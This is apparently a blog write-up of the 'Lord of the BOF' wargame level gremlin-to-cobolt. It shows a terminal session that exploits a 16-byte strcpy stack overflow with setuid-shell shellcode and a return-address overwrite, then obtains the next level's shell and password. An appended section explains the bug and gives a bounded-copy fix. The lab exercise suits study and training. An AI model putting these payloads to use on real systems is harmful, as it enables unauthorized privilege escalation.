  • [lob] gremlin->cobolt
    Study/LOB 2014. 7. 30. 20:00

    login: gremlin
    Password:
    Last login: Thu May 22 18:04:55 from 192.168.135.1
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c
    [gremlin@localhost gremlin]$ cat cobolt.c
    /*
            The Lord of the BOF : The Fellowship of the BOF
            - cobolt
            - small buffer
    */
    #include <stdio.h>
    #include <stdlib.h>
    #include <string.h>

    int main(int argc, char *argv[])
    {
        char buffer[16];            /* 16-byte stack buffer */
        if(argc < 2){
            printf("argv error\n");
            exit(0);
        }
        strcpy(buffer, argv[1]);    /* unbounded copy: argv[1] longer than 15 bytes overflows the buffer */
        printf("%s\n", buffer);
    }
    [gremlin@localhost gremlin]$ ltrace -i ./cobolt aaaa
    Can't execute `./cobolt': Operation not permitted
    [gremlin@localhost gremlin]$ cp cobolt oo
    [gremlin@localhost gremlin]$ ltrace -i ./oo aaaa
    [080483a1] __libc_start_main(0x08048430, 2, 0xbffffb84, 0x080482e0, 0x080484ac <unfinished ...>
    [0804841b] __register_frame_info(0x080494ec, 0x080495c8, 0xbffffb44, 0x08048305, 0x401081ec) = 0x40108d40
    [08048465] strcpy(0xbffffb28, "aaaa")             = 0xbffffb28
    [08048476] printf("%s\n", "aaaa"aaaa
    )                 = 5
    [080483ea] __deregister_frame_info(0x080494ec, 0xbffffb20, 0x080484c1, 0x401081ec, 0xbffffb34) = 0x080495c8
    [ffffffff] +++ exited (status 5) +++
    [gremlin@localhost gremlin]$ ./cobolt `python -c 'print "a"*20+"\x2b\xfb\xff\xbf"+"\x90"*200+"\x31\xc0\xb0\x31\xcd\x80\x89\xc1\x89\xc3\x31\xc0\xb0\x46\xcd\x80\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"'`
    aaaaaaaaaaaaaaaaaaaa+
    Segmentation fault
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c  oo
    [gremlin@localhost gremlin]$ gdb oo
    GNU gdb 19991004
    Copyright 1998 Free Software Foundation, Inc.
    GDB is free software, covered by the GNU General Public License, and you are
    welcome to change it and/or distribute copies of it under certain conditions.
    Type "show copying" to see the conditions.
    There is absolutely no warranty for GDB.  Type "show warranty" for details.
    This GDB was configured as "i386-redhat-linux"...
    (gdb) disas main
    Dump of assembler code for function main:
    0x8048430 <main>:    push   %ebp
    0x8048431 <main+1>:    mov    %esp,%ebp
    0x8048433 <main+3>:    sub    $0x10,%esp
    0x8048436 <main+6>:    cmpl   $0x1,0x8(%ebp)
    0x804843a <main+10>:    jg     0x8048453 <main+35>
    0x804843c <main+12>:    push   $0x80484d0
    0x8048441 <main+17>:    call   0x8048350 <printf>
    0x8048446 <main+22>:    add    $0x4,%esp
    0x8048449 <main+25>:    push   $0x0
    0x804844b <main+27>:    call   0x8048360 <exit>
    0x8048450 <main+32>:    add    $0x4,%esp
    0x8048453 <main+35>:    mov    0xc(%ebp),%eax
    0x8048456 <main+38>:    add    $0x4,%eax
    0x8048459 <main+41>:    mov    (%eax),%edx
    0x804845b <main+43>:    push   %edx
    0x804845c <main+44>:    lea    0xfffffff0(%ebp),%eax
    0x804845f <main+47>:    push   %eax
    0x8048460 <main+48>:    call   0x8048370 <strcpy>
    0x8048465 <main+53>:    add    $0x8,%esp
    0x8048468 <main+56>:    lea    0xfffffff0(%ebp),%eax
    0x804846b <main+59>:    push   %eax
    0x804846c <main+60>:    push   $0x80484dc
    0x8048471 <main+65>:    call   0x8048350 <printf>
    0x8048476 <main+70>:    add    $0x8,%esp
    0x8048479 <main+73>:    leave 
    0x804847a <main+74>:    ret   
    0x804847b <main+75>:    nop   
    0x804847c <main+76>:    nop   
    0x804847d <main+77>:    nop   
    0x804847e <main+78>:    nop   
    0x804847f <main+79>:    nop   
    End of assembler dump.
    (gdb) ls
    Undefined command: "ls".  Try "help".
    (gdb) b *main+56
    Breakpoint 1 at 0x8048468
    (gdb) r 1234
    Starting program: /home/gremlin/oo 1234

    Breakpoint 1, 0x8048468 in main ()
    (gdb) x/8x $esp
    0xbffffb28:    0x34333231    0x08048400    0x080494ec    0x08049500
    0xbffffb38:    0xbffffb58    0x400309cb    0x00000002    0xbffffb84
    (gdb) Quit
    (gdb) q
    The program is running.  Exit anyway? (y or n) y
    [gremlin@localhost gremlin]$ ls
    addr  addr.c  cobolt  cobolt.c  egg  egg.c  oo
    [gremlin@localhost gremlin]$ ./egg
    Using address: 0xbffffb18
    [gremlin@localhost gremlin]$ ./addr
    addr : 0xbffff5d5
    [gremlin@localhost gremlin]$
    [gremlin@localhost gremlin]$ bash2
    [gremlin@localhost gremlin]$ ./cobolt `python -c'print "a"*20+"\xd5\xf5\xff\xbf"'`
    aaaaaaaaaaaaaaaaaaaa曆
    bash$ ls
    ls: .: Permission denied
    bash$ my-pass
    euid = 502
    hacking exposed
    bash$
    bash$ id
    uid=502(cobolt) gid=501(gremlin) egid=502(cobolt) groups=501(gremlin)
    bash$
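The session above shows where the overflow comes from: cobolt.c copies argv[1] with strcpy into a 16-byte stack buffer, so 20 bytes reach the saved return address (16 for the buffer plus 4 for the saved EBP, matching the sub $0x10,%esp in the disassembly). Below is a bounded version of the same program, added here as an example that is not part of the original post or the LOB wargame; copy_arg_checked is a hypothetical helper name.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Constructed example, not the LOB cobolt binary. cobolt.c keeps a 16-byte
 * stack buffer (sub $0x10,%esp in the disassembly) and fills it with
 * strcpy(buffer, argv[1]); the saved EBP sits right above it and the return
 * address above that, which is why 20 bytes of argv[1] reach the return
 * address. The fix is to make the copy respect sizeof(buffer). */

#define BUF_SZ 16

/* Hypothetical helper: copy src into dst[dst_sz] only if it fits together
 * with its terminating NUL. Input that does not fit is rejected (-1) rather
 * than silently truncated, so an over-long argument becomes a clean error
 * instead of either a stack overwrite or a quietly mangled value. */
int copy_arg_checked(char *dst, size_t dst_sz, const char *src) {
    size_t n = 0;
    if (dst == NULL || src == NULL || dst_sz == 0)
        return -1;
    /* Measure src without reading past dst_sz bytes of it. */
    while (n < dst_sz && src[n] != '\0')
        n++;
    if (n == dst_sz)          /* no room left for the NUL terminator */
        return -1;
    memcpy(dst, src, n + 1);  /* n bytes plus the terminator */
    return 0;
}

/* Same program shape as cobolt.c, with the bounded copy in place of strcpy. */
int main(int argc, char *argv[]) {
    char buffer[BUF_SZ];
    if (argc < 2) {
        printf("argv error\n");
        exit(0);
    }
    if (copy_arg_checked(buffer, sizeof buffer, argv[1]) != 0) {
        fprintf(stderr, "argument too long (max %zu bytes)\n",
                sizeof buffer - 1);
        return 1;
    }
    printf("%s\n", buffer);
    return 0;
}
```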
